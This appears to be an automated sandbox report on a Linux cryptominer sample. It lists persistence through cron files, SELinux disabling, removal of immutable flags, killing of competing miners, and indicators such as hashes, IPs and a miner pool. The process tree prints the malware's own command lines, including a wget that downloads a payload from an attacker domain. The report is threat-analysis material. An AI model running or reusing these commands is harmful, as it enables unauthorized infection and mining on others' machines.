Analysis
max time kernel: 40s
max time network: 38s
platform: debian-9_armhf
resource: debian9-armhf-20240226-en
resource tags: arch:armhf, image:debian9-armhf-20240226-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 28-03-2024 22:19
Static task: static1
Behavioral task behavioral1: sample 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118, resource ubuntu1804-amd64-20240226-en
Behavioral task behavioral2: sample 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118, resource debian9-armhf-20240226-en
Behavioral task behavioral3: sample 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118, resource debian9-mipsbe-20240226-en
Behavioral task behavioral4: sample 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118, resource debian9-mipsel-20240226-en
General
Target: 1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
Size: 11KB
MD5: 1196d0a31402b04a32aa582ae6d2c15b
SHA1: 5d6a8c0437bdf30079188283b0e60d063e649f27
SHA256: ba2e2bda0794551b0d203c2b617a8b327baa68199e5d7dd22d8849a77fac1183
SHA512: cb9e5c0b2a430bd2963b64e659cb2cb65f20d53888e6a188f9831a65c0dd568550439423ff2349c7100e09f45ba3b07e97688c1d9190b2bc1d7a595f310cb28a
SSDEEP: 192:fQ6PgM8PvaA0Rj1veSS7MYtGRwcY3Pkfz216zPEDAzQSvmgVgIbc1H7vjjB4C1v6:fQ6PgM8PvaA0Rj1vy7fmjwMxzgX17j/s
Malware Config
Signatures

- Executes dropped EXE (2 IoCs)
  Processes (ioc / pid / process):
    /tmp/dbused  913  dbused
    /tmp/dbused  915  dbused

- Attempts to change immutable files (4 IoCs)
  Modifies inode attributes on the filesystem to allow changing of immutable files.
  Processes (pid / process):
    794  grep
    807  chattr
    790  chattr
    792  grep

- Checks CPU configuration (1 TTP, 1 IoC)
  Checks CPU information which indicates whether the system is a virtual machine.
  Processes (description / ioc / process):
    File opened for reading  /proc/cpuinfo  grep

- Creates/modifies Cron job (1 TTP, 6 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Processes (description / ioc / process):
    File opened for modification  /etc/cron.hourly/oanacroner1    1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
    File opened for modification  /etc/cron.d/root                1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
    File opened for modification  /etc/cron.d/apache              1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
    File opened for modification  /etc/cron.d/nginx               1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
    File opened for modification  /var/spool/cron/root            1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
    File opened for modification  /var/spool/cron/crontabs/root   1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

- Disables SELinux (7 IoCs)
  Disables SELinux security module.
  Processes (pid / process):
    753  grep
    765  grep
    771  grep
    920  grep
    667  setenforce
    726  grep
    733  grep

- Enumerates running processes
  Discovers information about currently running processes on the system.

- Reads CPU attributes (1 TTP, 17 IoCs)
  Processes (description / ioc / process):
    File opened for reading  /sys/devices/system/cpu/online  kill (14 reads), sysctl (1 read), ps (2 reads)

- Reads runtime system information (64 IoCs)
  Reads data from /proc virtual filesystem.
  Processes (description / ioc / process), all "File opened for reading":
    /proc/self/fd  xargs
    /proc/self/maps  awk (3 reads)
    /proc/filesystems  kill (2 reads), sed, mkdir
    /proc/sys/kernel/osrelease  kill (2 reads)
    ps (54 reads): /proc/uptime and the per-PID entries /proc/18/stat, /proc/792/cmdline, /proc/6/cmdline, /proc/684/stat, /proc/9/cmdline, /proc/29/status, /proc/661/cmdline, /proc/111/stat, /proc/794/cmdline, /proc/26/stat (twice), /proc/3/stat, /proc/41/status, /proc/305/stat, /proc/458/status, /proc/794/stat, /proc/274/status (twice), /proc/19/status, /proc/666/cmdline, /proc/43/cmdline, /proc/406/cmdline, /proc/406/status, /proc/273/status, /proc/278/status, /proc/9/cmdline (again), /proc/343/stat, /proc/420/status, /proc/684/cmdline, /proc/11/cmdline, /proc/152/cmdline, /proc/144/cmdline, /proc/309/stat, /proc/657/stat (twice), /proc/674/cmdline (twice), /proc/2/cmdline, /proc/109/stat, /proc/457/cmdline, /proc/664/cmdline, /proc/5/cmdline, /proc/8/status, /proc/9/status, /proc/16/stat, /proc/14/cmdline (twice), /proc/29/stat, /proc/7/cmdline, /proc/29/cmdline, /proc/13/stat, /proc/28/status, /proc/28/cmdline

- Writes file to tmp directory (2 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description / ioc):
    File opened for modification  /tmp/dbused
    File opened for modification  /tmp/bashirc
Processes
(each entry: executable path, then its command line; indentation shows nesting in the process tree, signature hits listed beneath the entry)

- /tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118: /tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
    Creates/modifies Cron job
  - /usr/sbin/setenforce: setenforce 0
      Disables SELinux
  - /bin/grep: grep -c processor /proc/cpuinfo
      Checks CPU configuration
  - /sbin/sysctl: sysctl -w "vm.nr_hugepages=3"
      Reads CPU attributes
  - /bin/grep: grep :3333
  - /usr/bin/awk: awk "{print \$7}"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /bin/sed: sed -e "s/\\/.*//g"
  - /bin/grep: grep :4444
  - /usr/bin/awk: awk "{print \$7}"
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /bin/grep: grep :5555
  - /usr/bin/awk: awk "{print \$7}"
      Reads runtime system information
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /bin/grep: grep :7777
  - /usr/bin/awk: awk "{print \$7}"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /bin/sed: sed -e "s/\\/.*//g"
  - /bin/grep: grep :14444
  - /usr/bin/awk: awk "{print \$7}"
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /bin/grep: grep :5790
      Disables SELinux
  - /usr/bin/awk: awk "{print \$7}"
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
        Reads runtime system information
  - /bin/grep: grep :45700
      Disables SELinux
  - /usr/bin/awk: awk "{print \$7}"
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
        Reads runtime system information
  - /bin/grep: grep :2222
  - /usr/bin/awk: awk "{print \$7}"
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
        Reads runtime system information
  - /bin/grep: grep :9999
  - /usr/bin/awk: awk "{print \$7}"
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /bin/grep: grep :20580
      Disables SELinux
  - /usr/bin/awk: awk "{print \$7}"
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
      Reads runtime system information
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /bin/grep: grep :13531
  - /usr/bin/awk: awk "{print \$7}"
      Reads runtime system information
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /bin/grep: grep 23.94.24.12:8080
      Disables SELinux
  - /bin/sed: sed -e "s/\\/.*//g"
      Reads runtime system information
  - /usr/bin/awk: awk "{print \$7}"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /bin/grep: grep 134.122.17.13:8080
      Disables SELinux
  - /usr/bin/awk: awk "{print \$7}"
      Reads runtime system information
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /bin/grep: grep 107.189.11.170:443
  - /usr/bin/awk: awk "{print \$7}"
  - /bin/sed: sed -e "s/\\/.*//g"
  - /usr/bin/xargs: xargs kill -9
    - /sbin/kill: kill -9
    - /bin/kill: kill -9
        Reads CPU attributes
  - /usr/bin/chattr: chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
      Attempts to change immutable files
  - /bin/ps: ps aux
      Reads CPU attributes
      Reads runtime system information
  - /bin/grep: grep -i "[a]liyun"
      Attempts to change immutable files
  - /bin/ps: ps aux
      Reads CPU attributes
      Reads runtime system information
  - /bin/grep: grep -i "[y]unjing"
      Attempts to change immutable files
  - /bin/sleep: sleep 1
  - /usr/bin/chattr: chattr -ai /tmp/dbused
      Attempts to change immutable files
  - /bin/mkdir: mkdir -p /var/spool/cron/crontabs
  - /bin/mkdir: mkdir -p /etc/cron.hourly
      Reads runtime system information
  - /bin/chmod: chmod 755 /etc/cron.hourly/oanacroner1
  - /bin/uname: uname -m
  - /usr/bin/wget: wget -q -O - http://bash.givemexyz.in/armv7l
  - /bin/chmod: chmod +x /tmp/dbused
  - /bin/chmod: chmod +x /tmp/dbused
  - /tmp/dbused: /tmp/dbused -c
      Executes dropped EXE
  - /tmp/dbused: /tmp/dbused -pwn
      Executes dropped EXE
  - /bin/sleep: sleep 5
  - /bin/uname: uname -m
  - /usr/bin/wget: wget -q -O - http://bash.givemexyz.in/bashirc.armv7l
- /usr/bin/seq: seq 0 255
- /usr/bin/sort: sort -R
- /usr/bin/head: head -n1
- /usr/bin/seq: seq 0 255
- /usr/bin/sort: sort -R
- /usr/bin/head: head -n1
- /sbin/ip: ip a
- /bin/grep: grep "BROADCAST\\|inet"
- /bin/grep: grep -oP "inet\\s+\\K\\d{1,3}\\.\\d{1,3}"
- /bin/grep: grep -v 127
- /bin/grep: grep -v inet6
- /bin/grep: grep -v 255
- /usr/bin/head: head -n1
- /bin/ping: ping -c 1 pool.supportxmr.com
- /bin/grep: grep "bytes of data"
- /usr/bin/wc: wc -l
- /bin/ping: ping -c 1 bash.givemexyz.in
- /bin/grep: grep "bytes of data"
- /usr/bin/wc: wc -l
- /bin/grep: grep "212.114.52.24:8080\\|194.5.249.24:8080"
- /bin/grep: grep "LISTEN\\|ESTABLISHED\\|TIME_WAIT"
- /bin/grep: grep -v grep
- /bin/grep: grep "212.114.52.24:8080\\|194.5.249.24:8080"
- /bin/grep: grep ESTABLISHED
- /bin/grep: grep -v grep
- /bin/grep: grep 104.168.71.132:80
    Disables SELinux
- /bin/grep: grep ESTABLISHED
- /bin/grep: grep -v grep
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- /etc/cron.d/apache
  Filesize: 284B
  MD5: 9e9f6a486d0ea5976184c95a2f52cd49
  SHA1: e44fe455508309e8e21f9f33fffcc7eecca0de57
  SHA256: 4d63cb713eb9c5f6082e7eb63dd3811d0b6f1e5d35fa3589c201496b222d2337
  SHA512: 1af5c94549c6f06ce522ee026da795226d3566e4868816844e9a6c7e3ffb7edb8b3457ac3cfe5c23f17e21b66e8464c9f79decc866f37e862f5e750307d273b1

- /etc/cron.d/nginx
  Filesize: 284B
  MD5: 69f8fe8920f737d807cfda8f9d2ff2dd
  SHA1: df11f2d59edac589962a0178e50b6117d18a1933
  SHA256: 5ad7db249a177b46bcb4b5e36ae590fe154b33fec7924bdf61481d281d3c2b8e
  SHA512: 034bd9e34f0deb1d7656ae2c914a304a4efca6920de9d1082a845cdb2ec13c71d46bc0a025a975125169e46c31ac87b7a73f4dc5b8e999e4b24308219f3c2137

- /etc/cron.d/root
  Filesize: 284B
  MD5: ddb2c00af645c486a790ed6d180b8819
  SHA1: 4ff1fc702a6d0bbf4cca6be1b2f3ef4d492a9340
  SHA256: 8f05cba82e2eb4ced38eb907928abce67112ebced31d4622428ddadc2d7a1120
  SHA512: 1f29d87c3d78bd42706a7eeedc7557f0d0370436a14cd2279bffa2af58036e1a6350b935b08c8635a9193d3f76e9d76ff3a9c08bfada64ef74f914b3354677a4

- /etc/cron.hourly/oanacroner1
  Filesize: 264B
  MD5: 5cc2369275d33b8007781d1024edca44
  SHA1: 3e977f6e183c114affa947b2a2a70f7159ccddcc
  SHA256: 4a123c1f9cb0b49e960603805f087bb73ad26ff72176eba5089ced91823c92fe
  SHA512: 94ecd7e71c2e1edd1b466154aa24f4715d53826e4dafd0fe65123d98f96a08cdd9793dbc5403a47a4a87549eb16c503424e9d799f954c3dc2191d2ac2777ea49

- /var/spool/cron/crontabs/root
  Filesize: 277B
  MD5: e3d993445d42ab3ed35d78335d8ae5a3
  SHA1: 515765b31ed7b7098c12b7baae361fc86f6903ca
  SHA256: 6a1c7caaf79b92073f63e1d84ce8bde50e85bfffe03a7f26d6d1264f685194bd
  SHA512: 006c013726d50d6f1de60c5ff63fcfd881d219f25e66f1011630772443e4a827ff2148cda34eac6f66cb01256edf0f875815bb13836b3b942930cb1be7ca766f

- /var/spool/cron/root
  Filesize: 280B
  MD5: 3abb4bc980da82bb669c1640539c5316
  SHA1: be90d689bd325d72f544ab87eed84871a0130f3d
  SHA256: 6b0977f4e9b0023b95cb213ecfd85870db7617cb9db493a6126daf11ace4a71b
  SHA512: ab1b09cf8751758ca9fc323d6ce21d4bf34267486b96e41d256a9983df23694a73e73c5b5e245a78055471db0f48e4cea4a9e26f8dbf73924fcc4649f59963ff

- memory/763-1-0xb6c23000-0xb6c34044-memory.dmp